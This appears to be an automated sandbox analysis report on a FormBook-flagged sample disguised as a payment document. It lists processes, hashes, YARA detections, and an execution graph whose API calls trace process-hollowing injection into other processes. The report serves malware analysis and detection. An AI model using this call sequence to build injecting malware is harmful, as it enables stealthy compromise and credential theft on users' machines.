                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:20:37:29
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\systeminfo.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\systeminfo.exe"
                                                                                                                                                                              Imagebase:0xb60000
                                                                                                                                                                              File size:76'800 bytes
                                                                                                                                                                              MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4106690765.0000000004520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:20:37:42
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe"
                                                                                                                                                                              Imagebase:0xe30000
                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:20:37:55
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Disassembly

                                                                                                                                                                              Reset < >

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:10.6%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:1.3%
                                                                                                                                                                                Total number of Nodes:229
                                                                                                                                                                                Total number of Limit Nodes:14
                                                                                                                                                                                execution_graph 29505 7ad668 DuplicateHandle 29506 7ad6fe 29505->29506 29507 7a4668 29508 7a467a 29507->29508 29509 7a4686 29508->29509 29511 7a4783 29508->29511 29512 7a479d 29511->29512 29516 7a4888 29512->29516 29520 7a4884 29512->29520 29518 7a48af 29516->29518 29517 7a498c 29517->29517 29518->29517 29524 7a44e4 29518->29524 29521 7a48af 29520->29521 29522 7a44e4 CreateActCtxA 29521->29522 29523 7a498c 29521->29523 29522->29523 29525 7a5918 CreateActCtxA 29524->29525 29527 7a59db 29525->29527 29538 66d7348 29540 66d736c 29538->29540 29541 66d6e8c 29540->29541 29542 66d77f0 OutputDebugStringW 29541->29542 29544 66d786f 29542->29544 29544->29540 29566 66d2358 29567 66d2364 29566->29567 29572 66d5168 29567->29572 29577 66d5121 29567->29577 29583 66d5158 29567->29583 29568 66d2375 29573 66d5184 29572->29573 29588 66d60a0 29573->29588 29593 66d6090 29573->29593 29574 66d522e 29574->29568 29578 66d512e 29577->29578 29579 66d51a4 29577->29579 29578->29568 29581 66d60a0 NtQueryInformationProcess 29579->29581 29582 66d6090 NtQueryInformationProcess 29579->29582 29580 66d522e 29580->29568 29581->29580 29582->29580 29584 66d5184 29583->29584 29586 66d60a0 NtQueryInformationProcess 29584->29586 29587 66d6090 NtQueryInformationProcess 29584->29587 29585 66d522e 29585->29568 29586->29585 29587->29585 29589 66d60b2 29588->29589 29598 66d60e0 29589->29598 29603 66d60d0 29589->29603 29590 66d60c6 29590->29574 29594 66d60b2 29593->29594 29596 66d60e0 NtQueryInformationProcess 29594->29596 29597 66d60d0 NtQueryInformationProcess 29594->29597 29595 66d60c6 29595->29574 29596->29595 29597->29595 29599 66d60fa 29598->29599 29608 66d61a1 29599->29608 29612 66d61b0 29599->29612 29600 66d611d 29600->29590 29604 66d60fa 29603->29604 29606 66d61a1 NtQueryInformationProcess 29604->29606 29607 66d61b0 NtQueryInformationProcess 29604->29607 29605 66d611d 29605->29590 29606->29605 29607->29605 29609 66d61d4 29608->29609 29616 66d2294 29609->29616 29613 66d61d4 29612->29613 29614 66d2294 NtQueryInformationProcess 29613->29614 29615 66d625b 29614->29615 29615->29600 29617 66d6310 NtQueryInformationProcess 29616->29617 29619 66d625b 29617->29619 29619->29600 29545 c05ae8 29546 c05c73 29545->29546 29548 c05b0e 29545->29548 29548->29546 29549 c01da8 29548->29549 29550 c05d68 PostMessageW 29549->29550 29551 c05dd4 29550->29551 29551->29548 29620 c040b8 29621 c04072 29620->29621 29622 c03fa0 29621->29622 29626 c048f0 29621->29626 29632 c04899 29621->29632 29638 c048a8 29621->29638 29627 c048c7 29626->29627 29628 c048fe 29626->29628 29643 c04bc0 29627->29643 29662 c04bd0 29627->29662 29628->29622 29629 c048e6 29629->29622 29633 c0486f 29632->29633 29634 c048a6 29632->29634 29633->29622 29636 c04bc0 12 API calls 29634->29636 29637 c04bd0 12 API calls 29634->29637 29635 c048e6 29635->29622 29636->29635 29637->29635 29639 c048c2 29638->29639 29641 c04bc0 12 API calls 29639->29641 29642 c04bd0 12 API calls 29639->29642 29640 c048e6 29640->29622 29641->29640 29642->29640 29644 c04be5 29643->29644 29681 c05401 29644->29681 29686 c054dc 29644->29686 29690 c04efb 29644->29690 29694 c05099 29644->29694 29699 c051f6 29644->29699 29704 c04db6 29644->29704 29709 c04cf6 29644->29709 29714 c05115 29644->29714 29719 c053b3 29644->29719 29723 c05312 29644->29723 29727 c04e70 29644->29727 29732 c04d8f 29644->29732 29737 c04cee 29644->29737 29742 c051ab 29644->29742 29747 c055a9 29644->29747 29751 c05484 29644->29751 29645 c04bf7 29645->29629 29663 c04be5 29662->29663 29665 c05401 2 API calls 29663->29665 29666 c05484 2 API calls 29663->29666 29667 c055a9 2 API calls 29663->29667 29668 c051ab 2 API calls 29663->29668 29669 c04cee 2 API calls 29663->29669 29670 c04d8f 2 API calls 29663->29670 29671 c04e70 2 API calls 29663->29671 29672 c05312 2 API calls 29663->29672 29673 c053b3 2 API calls 29663->29673 29674 c05115 2 API calls 29663->29674 29675 c04cf6 2 API calls 29663->29675 29676 c04db6 2 API calls 29663->29676 29677 c051f6 2 API calls 29663->29677 29678 c05099 2 API calls 29663->29678 29679 c04efb 2 API calls 29663->29679 29680 c054dc 2 API calls 29663->29680 29664 c04bf7 29664->29629 29665->29664 29666->29664 29667->29664 29668->29664 29669->29664 29670->29664 29671->29664 29672->29664 29673->29664 29674->29664 29675->29664 29676->29664 29677->29664 29678->29664 29679->29664 29680->29664 29682 c051cf 29681->29682 29756 c036f0 29682->29756 29760 c036e8 29682->29760 29683 c05600 29764 c03610 29686->29764 29768 c03618 29686->29768 29687 c054f6 29772 c037b0 29690->29772 29776 c037a9 29690->29776 29691 c04f29 29691->29645 29695 c04e8e 29694->29695 29696 c04e16 29695->29696 29780 c03561 29695->29780 29784 c03568 29695->29784 29696->29645 29701 c0549b 29699->29701 29700 c055a2 29700->29645 29701->29700 29702 c037b0 WriteProcessMemory 29701->29702 29703 c037a9 WriteProcessMemory 29701->29703 29702->29701 29703->29701 29705 c04dad 29704->29705 29705->29645 29788 c03a38 29705->29788 29792 c03a2d 29705->29792 29710 c04ced 29709->29710 29710->29645 29712 c03a38 CreateProcessA 29710->29712 29713 c03a2d CreateProcessA 29710->29713 29711 c04deb 29711->29645 29712->29711 29713->29711 29715 c05033 29714->29715 29715->29714 29717 c036f0 VirtualAllocEx 29715->29717 29718 c036e8 VirtualAllocEx 29715->29718 29716 c05600 29717->29716 29718->29716 29721 c037b0 WriteProcessMemory 29719->29721 29722 c037a9 WriteProcessMemory 29719->29722 29720 c053d7 29720->29645 29721->29720 29722->29720 29796 c038a0 29723->29796 29800 c03898 29723->29800 29724 c052bc 29724->29645 29728 c04e76 29727->29728 29730 c03561 ResumeThread 29728->29730 29731 c03568 ResumeThread 29728->29731 29729 c04e16 29729->29645 29730->29729 29731->29729 29733 c04d05 29732->29733 29735 c03a38 CreateProcessA 29733->29735 29736 c03a2d CreateProcessA 29733->29736 29734 c04deb 29734->29645 29735->29734 29736->29734 29738 c04d05 29737->29738 29740 c03a38 CreateProcessA 29738->29740 29741 c03a2d CreateProcessA 29738->29741 29739 c04deb 29739->29645 29740->29739 29741->29739 29743 c051b1 29742->29743 29745 c036f0 VirtualAllocEx 29743->29745 29746 c036e8 VirtualAllocEx 29743->29746 29744 c05600 29745->29744 29746->29744 29749 c03610 Wow64SetThreadContext 29747->29749 29750 c03618 Wow64SetThreadContext 29747->29750 29748 c055c3 29749->29748 29750->29748 29752 c0548a 29751->29752 29753 c055a2 29752->29753 29754 c037b0 WriteProcessMemory 29752->29754 29755 c037a9 WriteProcessMemory 29752->29755 29753->29645 29754->29752 29755->29752 29757 c03730 VirtualAllocEx 29756->29757 29759 c0376d 29757->29759 29759->29683 29761 c036f1 VirtualAllocEx 29760->29761 29763 c0376d 29761->29763 29763->29683 29765 c0365d Wow64SetThreadContext 29764->29765 29767 c036a5 29765->29767 29767->29687 29769 c0365d Wow64SetThreadContext 29768->29769 29771 c036a5 29769->29771 29771->29687 29773 c037f8 WriteProcessMemory 29772->29773 29775 c0384f 29773->29775 29775->29691 29777 c037f8 WriteProcessMemory 29776->29777 29779 c0384f 29777->29779 29779->29691 29781 c03568 ResumeThread 29780->29781 29783 c035d9 29781->29783 29783->29696 29785 c035a8 ResumeThread 29784->29785 29787 c035d9 29785->29787 29787->29696 29789 c03ac1 CreateProcessA 29788->29789 29791 c03c83 29789->29791 29793 c03a38 CreateProcessA 29792->29793 29795 c03c83 29793->29795 29797 c038eb ReadProcessMemory 29796->29797 29799 c0392f 29797->29799 29799->29724 29801 c038eb ReadProcessMemory 29800->29801 29803 c0392f 29801->29803 29803->29724 29528 7ad420 29529 7ad466 GetCurrentProcess 29528->29529 29531 7ad4b8 GetCurrentThread 29529->29531 29532 7ad4b1 29529->29532 29533 7ad4ee 29531->29533 29534 7ad4f5 GetCurrentProcess 29531->29534 29532->29531 29533->29534 29537 7ad52b 29534->29537 29535 7ad553 GetCurrentThreadId 29536 7ad584 29535->29536 29537->29535 29552 7aac90 29556 7aad88 29552->29556 29561 7aad84 29552->29561 29553 7aac9f 29557 7aadbc 29556->29557 29558 7aad99 29556->29558 29557->29553 29558->29557 29559 7aafc0 GetModuleHandleW 29558->29559 29560 7aafed 29559->29560 29560->29553 29562 7aadbc 29561->29562 29563 7aad99 29561->29563 29562->29553 29563->29562 29564 7aafc0 GetModuleHandleW 29563->29564 29565 7aafed 29564->29565 29565->29553

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00C06BE0 Relevance: 1.7, Strings: 1, Instructions: 405COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1362 c06be0-c06c02 1363 c06fb2 1362->1363 1364 c06c08-c06c43 call c06890 call c068a0 call c068b0 1362->1364 1365 c06fb4-c06fb7 1363->1365 1377 c06c45-c06c4f 1364->1377 1378 c06c56-c06c76 1364->1378 1367 c06fc1-c06fc4 1365->1367 1368 c06fb9-c06fbb 1365->1368 1372 c06fcc-c06fd4 1367->1372 1368->1367 1374 c06fda-c06fe1 1372->1374 1377->1378 1380 c06c78-c06c82 1378->1380 1381 c06c89-c06ca9 1378->1381 1380->1381 1383 c06cab-c06cb5 1381->1383 1384 c06cbc-c06cdc 1381->1384 1383->1384 1386 c06cde-c06ce8 1384->1386 1387 c06cef-c06cf8 call c068c0 1384->1387 1386->1387 1390 c06cfa-c06d15 call c068c0 1387->1390 1391 c06d1c-c06d25 call c068d0 1387->1391 1390->1391 1396 c06d27-c06d42 call c068d0 1391->1396 1397 c06d49-c06d52 call c068e0 1391->1397 1396->1397 1403 c06d54-c06d58 call c068f0 1397->1403 1404 c06d5d-c06d79 1397->1404 1403->1404 1408 c06d91-c06d95 1404->1408 1409 c06d7b-c06d81 1404->1409 1412 c06d97-c06da8 call c06900 1408->1412 1413 c06daf-c06df7 1408->1413 1410 c06d83 1409->1410 1411 c06d85-c06d87 1409->1411 1410->1408 1411->1408 1412->1413 1419 c06df9 1413->1419 1420 c06e1b-c06e22 1413->1420 1421 c06dfc-c06e02 1419->1421 1422 c06e24-c06e33 1420->1422 1423 c06e39-c06e47 call c06910 1420->1423 1424 c06fe2 1421->1424 1425 c06e08-c06e0e 1421->1425 1422->1423 1432 c06e51-c06e7b call c06920 1423->1432 1433 c06e49-c06e4b 1423->1433 1431 c06fe6 1424->1431 1427 c06e10-c06e12 1425->1427 1428 c06e18-c06e19 1425->1428 1427->1428 1428->1420 1428->1421 1431->1365 1434 c06fe7-c06fe9 1431->1434 1447 c06ea8-c06ec4 1432->1447 1448 c06e7d-c06e8b 1432->1448 1433->1432 1435 c07059 1434->1435 1436 c06feb-c06fed 1434->1436 1435->1431 1439 c0705a-c0705c 1435->1439 1440 c0705d-c0705f 1436->1440 1441 c06fef-c07021 1436->1441 1439->1440 1445 c07061-c07065 1440->1445 1446 c0706c-c07079 1440->1446 1442 c07080-c07090 1441->1442 1443 c07023-c07044 1441->1443 1451 c07266-c0726d 1442->1451 1452 c07096-c070a0 1442->1452 1443->1442 1453 c07046-c0704c 1443->1453 1445->1446 1446->1442 1462 c06ec6-c06ed0 1447->1462 1463 c06ed7-c06efe call c06930 1447->1463 1448->1447 1461 c06e8d-c06ea1 1448->1461 1458 c0727c-c0728f 1451->1458 1459 c0726f-c07277 call c01e2c 1451->1459 1456 c070a2-c070a9 1452->1456 1457 c070aa-c070b4 1452->1457 1453->1439 1460 c0704e-c07050 1453->1460 1464 c07299-c0738c 1457->1464 1465 c070ba-c070fa 1457->1465 1459->1458 1460->1435 1461->1447 1462->1463 1474 c06f00-c06f06 1463->1474 1475 c06f16-c06f1a 1463->1475 1491 c07112-c07116 1465->1491 1492 c070fc-c07102 1465->1492 1478 c06f08 1474->1478 1479 c06f0a-c06f0c 1474->1479 1480 c06f35-c06f51 1475->1480 1481 c06f1c-c06f2e 1475->1481 1478->1475 1479->1475 1487 c06f53-c06f59 1480->1487 1488 c06f69-c06f6d 1480->1488 1481->1480 1493 c06f5b 1487->1493 1494 c06f5d-c06f5f 1487->1494 1488->1374 1490 c06f6f-c06f7d 1488->1490 1503 c06f8f-c06f93 1490->1503 1504 c06f7f-c06f8d 1490->1504 1498 c07143-c0715b call c06a44 1491->1498 1499 c07118-c0713d 1491->1499 1496 c07104 1492->1496 1497 c07106-c07108 1492->1497 1493->1488 1494->1488 1496->1491 1497->1491 1512 c07168-c07170 1498->1512 1513 c0715d-c07162 1498->1513 1499->1498 1510 c06f99-c06fb1 1503->1510 1504->1503 1504->1510 1516 c07172-c07180 1512->1516 1517 c07186-c071a5 1512->1517 1513->1512 1516->1517 1521 c071a7-c071ad 1517->1521 1522 c071bd-c071c1 1517->1522 1523 c071b1-c071b3 1521->1523 1524 c071af 1521->1524 1525 c071c3-c071d0 1522->1525 1526 c0721a-c07263 1522->1526 1523->1522 1524->1522 1530 c071d2-c07204 1525->1530 1531 c07206-c07213 1525->1531 1526->1451 1530->1531 1531->1526
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715790734.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_c00000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: U
                                                                                                                                                                                • API String ID: 0-3372436214
                                                                                                                                                                                • Opcode ID: 87718bd9616db8134c58c0ae75da94462b6fb10833a5c7393385c744e5484e6f
                                                                                                                                                                                • Instruction ID: 91b9102884f662e2fdb7f7a958a6ced1891efb12a04ed3ea5a003650aaede461
                                                                                                                                                                                • Opcode Fuzzy Hash: 87718bd9616db8134c58c0ae75da94462b6fb10833a5c7393385c744e5484e6f
                                                                                                                                                                                • Instruction Fuzzy Hash: 23E1B830B016009FDB29DFA9C454BAEB7FAAF89700F24456DE1569B2D1CB35EE01CB91
                                                                                                                                                                                Function 066D6308 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 066D638F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InformationProcessQuery
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1778838933-0
                                                                                                                                                                                • Opcode ID: d0fbd60d9d8250655d34e87519c647f65b9c350f4cb51b2b892060b911da5593
                                                                                                                                                                                • Instruction ID: e55ba462ac32a9d426586663ed9494077401b13305206b0d86e37090b7435745
                                                                                                                                                                                • Opcode Fuzzy Hash: d0fbd60d9d8250655d34e87519c647f65b9c350f4cb51b2b892060b911da5593
                                                                                                                                                                                • Instruction Fuzzy Hash: 6821EDB5D00349EFCB10DF9AD885ACEBBF4FB48320F10842AE958A7250C775A944CFA5
                                                                                                                                                                                Function 066D2294 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 066D638F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InformationProcessQuery
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1778838933-0
                                                                                                                                                                                • Opcode ID: ea2b62daf54b1d122db68c2e4d69fe5ebaed3579709f61306776484a3fd02407
                                                                                                                                                                                • Instruction ID: 80464dfc4bf625e053b413bc4edc8abaa6bd4f12755aa4bad28da0a3d25c0ef3
                                                                                                                                                                                • Opcode Fuzzy Hash: ea2b62daf54b1d122db68c2e4d69fe5ebaed3579709f61306776484a3fd02407
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F21D9B5D00248EFCB10CF9AD884ADEBBF4FB48324F10842AE958A7310D775A954CFA4
                                                                                                                                                                                Function 066D3658 Relevance: .5, Instructions: 506COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c9e31937ad42ce234fc4a0fb724da7cee176dee34b5d6deb0ea8fdd8abc87c93
                                                                                                                                                                                • Instruction ID: 64b26ac3810cede0ec4776bdd1f5053f7fd2c885d53a07f2bdbef05ab08bb098
                                                                                                                                                                                • Opcode Fuzzy Hash: c9e31937ad42ce234fc4a0fb724da7cee176dee34b5d6deb0ea8fdd8abc87c93
                                                                                                                                                                                • Instruction Fuzzy Hash: F4427D74E01229CFDB54CFA9C994B9DBBB2FB49310F1081A9E809A7355D734AE81CF60
                                                                                                                                                                                Function 066D2388 Relevance: .5, Instructions: 482COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ef9ae95ce76e3d8910526b2c8590680bf45c3b1f309d69518d120cd22d3792ed
                                                                                                                                                                                • Instruction ID: a615b3237a48624db76dc376f53d22006a21eda010d343c5864ec84aaeb4f277
                                                                                                                                                                                • Opcode Fuzzy Hash: ef9ae95ce76e3d8910526b2c8590680bf45c3b1f309d69518d120cd22d3792ed
                                                                                                                                                                                • Instruction Fuzzy Hash: 0132D270D01219CFDBA0DF69C580A8EFBB6BF48351F55D195E508AB212DB30EA85CFA4
                                                                                                                                                                                Function 066D3649 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b6ce8385f26afa86844411b9da0bfd4c728617e62b080d3a7ed1a7dcbf6e286e
                                                                                                                                                                                • Instruction ID: 4b7117d1c9a1239ad8bedb4a53cffe641967d4094394e9d7e9c80f8a20f61394
                                                                                                                                                                                • Opcode Fuzzy Hash: b6ce8385f26afa86844411b9da0bfd4c728617e62b080d3a7ed1a7dcbf6e286e
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A61B574E01218DFEB58CFAAD994B9DBBB2FF88300F1481A9D809A7354D7359941CF60
                                                                                                                                                                                Function 066D9E58 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e799dcac8fb0564ebb820ebdb50c580172055b0c5e205360f9f49bc40277b6e4
                                                                                                                                                                                • Instruction ID: 265818c9f3b89b3b5c6e83a7947716f94dee2480a344e339a920999882db6bff
                                                                                                                                                                                • Opcode Fuzzy Hash: e799dcac8fb0564ebb820ebdb50c580172055b0c5e205360f9f49bc40277b6e4
                                                                                                                                                                                • Instruction Fuzzy Hash: 08518175E01219DFDB48DFEAC8446EEBBB2FF88301F10812AE919AB254D7745946CB50
                                                                                                                                                                                Function 066D2378 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b4f5d92d7f9c6e13b930f0b0715d425a43bb4488b2892ed47724538a464ccc3a
                                                                                                                                                                                • Instruction ID: eb6a1ae5b21e1a1f60ced25f2046aed3f2afd1d45f7632c43a0d332d18a98f1a
                                                                                                                                                                                • Opcode Fuzzy Hash: b4f5d92d7f9c6e13b930f0b0715d425a43bb4488b2892ed47724538a464ccc3a
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E41F771E00619CFEB58CF6AC85179EBBB2BFC8300F14C1AAD55CA7255EB344A858F51
                                                                                                                                                                                Function 066D9E48 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1720532618.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_66d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 222f92dc8755d4bdc11fe092b7eacb6b93d464c794e9f9212910a6a03c1d2e66
                                                                                                                                                                                • Instruction ID: b8587f577317b0fa593ba49284b771866f7adcc2c9983d9d63ef5f59d1188d95
                                                                                                                                                                                • Opcode Fuzzy Hash: 222f92dc8755d4bdc11fe092b7eacb6b93d464c794e9f9212910a6a03c1d2e66
                                                                                                                                                                                • Instruction Fuzzy Hash: B4418171E016589FDB48DFEAD88469EFBF2BF88300F14C12AE419AB254DB345A46CF50
                                                                                                                                                                                Function 007AD411 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 817 7ad411-7ad4af GetCurrentProcess 821 7ad4b8-7ad4ec GetCurrentThread 817->821 822 7ad4b1-7ad4b7 817->822 823 7ad4ee-7ad4f4 821->823 824 7ad4f5-7ad529 GetCurrentProcess 821->824 822->821 823->824 826 7ad52b-7ad531 824->826 827 7ad532-7ad54d call 7ad5f8 824->827 826->827 830 7ad553-7ad582 GetCurrentThreadId 827->830 831 7ad58b-7ad5ed 830->831 832 7ad584-7ad58a 830->832 832->831
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 007AD49E
                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 007AD4DB
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 007AD518
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 007AD571
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1715216816.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7a0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                • Opcode ID: 5db09a8c6bae3145b9c9c96f9910ef5941e71eae832cf13d95da93c848336b67
                                                                                                                                                                                • Instruction ID: 2244e586d957c12b662a8c77a97bbc7c9d937ccb7c210c97b93f95ec6366d5cd
                                                                                                                                                                                • Opcode Fuzzy Hash: 5db09a8c6bae3145b9c9c96f9910ef5941e71eae832cf13d95da93c848336b67
                                                                                                                                                                                • Instruction Fuzzy Hash: C15168B0D012498FDB14DFA9D588BDEBBF1AF88304F208569E419A73A0DB749984CF65
                                                                                                                                                                                Function 007AD420 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
